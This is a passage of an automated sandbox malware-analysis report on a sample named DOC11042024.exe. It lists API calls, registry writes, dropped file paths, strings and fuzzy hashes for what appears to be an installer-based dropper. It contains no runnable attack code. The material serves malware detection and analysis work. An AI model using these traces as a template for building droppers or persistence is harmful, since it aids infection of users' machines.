                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: %TMP%$C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$anagallis\salpetersyrlingens\Derrieres
                                                                              • API String ID: 1941528284-4107701048
                                                                              • Opcode ID: 26ce854ad2a687dd4b68b877923e8a366a5206fcc7c9fcc1248f97bd833514a2
                                                                              • Instruction ID: 22a91fb72557606927d70f2de95ff677577d9c63a8d7304a52a497fb5f012bc3
                                                                              • Opcode Fuzzy Hash: 26ce854ad2a687dd4b68b877923e8a366a5206fcc7c9fcc1248f97bd833514a2
                                                                              • Instruction Fuzzy Hash: B341A171900514BACF10BBB5CD869AF7A79EF05369F20423BF411B11E1D63C9A419AAE

                                                                              Control-flow Graph (entry basic block 405156-40516b; rendered graph not reproduced in this text)
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                              • lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                              • lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: c7982dcc7f83d9d1842baaa3c0c2181428a9a97c7e691b8a5e5e7162ba0b32dc
                                                                              • Instruction ID: d692a32c2c93acf61f21c05d2d51278f0d0ef08fe7b7c33e5886d0bb106249d0
                                                                              • Opcode Fuzzy Hash: c7982dcc7f83d9d1842baaa3c0c2181428a9a97c7e691b8a5e5e7162ba0b32dc
                                                                              • Instruction Fuzzy Hash: 8F219D75D00618BADB219F95ED44ADFBFB8EF54350F10807AF944B62A0C3798A41CFA8

                                                                              Control-flow Graph (entry basic block 402ff8-403007; rendered graph not reproduced in this text)
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00000000,?,?,?,00402FA4,000000FF,00000000,00000000,00409230,?), ref: 0040301F
                                                                              • ReadFile.KERNELBASE(00409230,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402FA4,000000FF,00000000,00000000,00409230), ref: 0040304C
                                                                              • ReadFile.KERNELBASE(00413E78,00004000,?,00000000,00409230,?,00402FA4,000000FF,00000000,00000000,00409230,?), ref: 004030A6
                                                                              • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,?,00402FA4,000000FF,00000000,00000000,00409230,?), ref: 004030BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$Read$PointerWrite
                                                                              • String ID: x>A
                                                                              • API String ID: 2113905535-3854404225
                                                                              • Opcode ID: d62910b3130867b8d2b2b4b66368bca281eb4fe54e9a8637888efbc56b62b4fa
                                                                              • Instruction ID: 8d48c07fc761829a1fe9f1a1938812e098a54f4c61c40dafa2fa98847bc1c045
                                                                              • Opcode Fuzzy Hash: d62910b3130867b8d2b2b4b66368bca281eb4fe54e9a8637888efbc56b62b4fa
                                                                              • Instruction Fuzzy Hash: F4311631500209FBDF21CF56DC45ADE7FBCEB89365B20803AF514AA1A1D3349E51DBA9

                                                                              Control-flow Graph (entry basic block 403123-40314c; rendered graph not reproduced in this text)
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00403138
                                                                                • Part of subcall function 004032D1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F7D,?), ref: 004032DF
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,0040302E,00000004,00000000,00000000,00000000,?,?,?,00402FA4,000000FF,00000000), ref: 0040316B
                                                                              • WriteFile.KERNELBASE(0040BE78,004115C3,00000000,00000000,00413E78,00004000,?,00000000,?,0040302E,00000004,00000000,00000000,00000000,?,?), ref: 00403225
                                                                              • SetFilePointer.KERNELBASE(000EB5FA,00000000,00000000,00413E78,00004000,?,00000000,?,0040302E,00000004,00000000,00000000,00000000,?,?), ref: 00403277
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$CountTickWrite
                                                                              • String ID: x>A
                                                                              • API String ID: 2146148272-3854404225
                                                                              • Opcode ID: fa2ac6caa82680caf266c7245f95f6909007e954e5544f6c93c355d0f4c1dc10
                                                                              • Instruction ID: be67401aa815a72444c4fca473ff593188792000a8d1d40a5fc3cceba1093085
                                                                              • Opcode Fuzzy Hash: fa2ac6caa82680caf266c7245f95f6909007e954e5544f6c93c355d0f4c1dc10
                                                                              • Instruction Fuzzy Hash: 3041CE325042019BDB10AF29ED848AA7BACFB55316720827FE910B22F0D7799D41DBDD

                                                                              Control-flow Graph (entry basic block 40232f-402375; rendered graph not reproduced in this text)
                                                                              APIs
                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                              • lstrlenW.KERNEL32(anagallis\salpetersyrlingens\Derrieres,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                              • RegCloseKey.ADVAPI32(?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateValuelstrlen
                                                                              • String ID: anagallis\salpetersyrlingens\Derrieres
                                                                              • API String ID: 1356686001-2143557105
                                                                              • Opcode ID: dfe757ae4a63ab883042433471831b04dad67b44d44d30b17957abb00fdbcd93
                                                                              • Instruction ID: 234511cbfb2b8cfa258c76439d50fcb03ec8edfd55ed9f08cc7278d5cba6d51a
                                                                              • Opcode Fuzzy Hash: dfe757ae4a63ab883042433471831b04dad67b44d44d30b17957abb00fdbcd93
                                                                              • Instruction Fuzzy Hash: 1B118171A00109BFEB10AFA0DD49EAF777CEB00358F10043AF505B61D0D7B85D419B69

                                                                              Control-flow Graph
                                                                              APIs
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(?,?,00424ED8,?,00405A29,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004059C3
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059C8
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059E0
                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?,00000000,000000F0), ref: 00401630
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213, xrefs: 00401623
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                              • String ID: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
                                                                              • API String ID: 3751793516-2216720624

                                                                              Control-flow Graph
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971

                                                                              Control-flow Graph
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405FE2,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405D99
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405FE2,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DBA
                                                                              • RegCloseKey.KERNELBASE(?,?,00405FE2,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDD
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3677997916-2954849223

                                                                              Control-flow Graph
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00405B78
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040331A,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405B93
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-44229769
                                                                              APIs
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                                • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                                • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                                • Part of subcall function 00405624: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405649
                                                                                • Part of subcall function 00405624: CloseHandle.KERNEL32(?), ref: 00405656
                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 3585118688-0
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405649
                                                                              • CloseHandle.KERNEL32(?), ref: 00405656
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405637
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
APIs
  • Part of subcall function 00406136: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00406199
  • Part of subcall function 00406136: CharNextW.USER32(?,?,?,00000000), ref: 004061A8
  • Part of subcall function 00406136: CharNextW.USER32(?,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061AD
  • Part of subcall function 00406136: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061C0
• CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00403309
Strings
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID: 1033$C:\Users\user\AppData\Local\Temp\
• API String ID: 4115351271-2030658151
• Opcode ID: 2ec91ac65976baf29333d001683f802e10f31075cc742f321c5f6d3f2165e938
• Instruction ID: e9b08fedfb55d49ca3acf058f4934da210e180d0de9b375c3427e63d116d49ff
• Opcode Fuzzy Hash: 2ec91ac65976baf29333d001683f802e10f31075cc742f321c5f6d3f2165e938
• Instruction Fuzzy Hash: C1D0C72190693175C55537263D16FCF151C5F1636AF125477F80A751C1CB7C194245FE
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38ac597608f2b0135486df2f194b5299640307e0aff715a2548ebc85a366a8b3
• Instruction ID: 514215012d807dac5c02b099702ee1b640487acce8dcd31e9022cfa1c5c92198
• Opcode Fuzzy Hash: 38ac597608f2b0135486df2f194b5299640307e0aff715a2548ebc85a366a8b3
• Instruction Fuzzy Hash: 2CA15471E00228DBDF28CFA8C8447ADBBB1FF44305F15842AD856BB281D3786A96CF44
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fef29820703342f0d36661d4b7a1bb0a8ca566ed46be5046b660279d11318d2b
• Instruction ID: f9a29c317f0b65048224f427f587678b851063c9d42b2dc7dbc2af42e1c1c160
• Opcode Fuzzy Hash: fef29820703342f0d36661d4b7a1bb0a8ca566ed46be5046b660279d11318d2b
• Instruction Fuzzy Hash: 17914470D04228CBDF28CF98C8447ADBBB1FF44305F15812AD852BB281D7786A96DF48
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e334cff55d188459d4f5ad777606bb6e0fa390321f0c06170d0674af379beb9
• Instruction ID: b3739fc903129aefda3f0dc59f21d1d1e8c42473030778f70acd831c52ff2ff8
• Opcode Fuzzy Hash: 7e334cff55d188459d4f5ad777606bb6e0fa390321f0c06170d0674af379beb9
• Instruction Fuzzy Hash: 73814571E00228DBDF24CFA8C884BADBBB1FF44305F25816AD456BB291D7385A96CF14
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e0248f7c4af27964765fc6b01880602192228a8f4c2dc082618ccfac290c0623
• Instruction ID: 1efa4fe38cd136b7e41ba429c88201cba22942bd8061bdf16cea85fc101f1410
• Opcode Fuzzy Hash: e0248f7c4af27964765fc6b01880602192228a8f4c2dc082618ccfac290c0623
• Instruction Fuzzy Hash: 99817771E04228DBDF24CFA8C844BADBBB1FF44305F11816AD856BB281D7786A96CF54
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
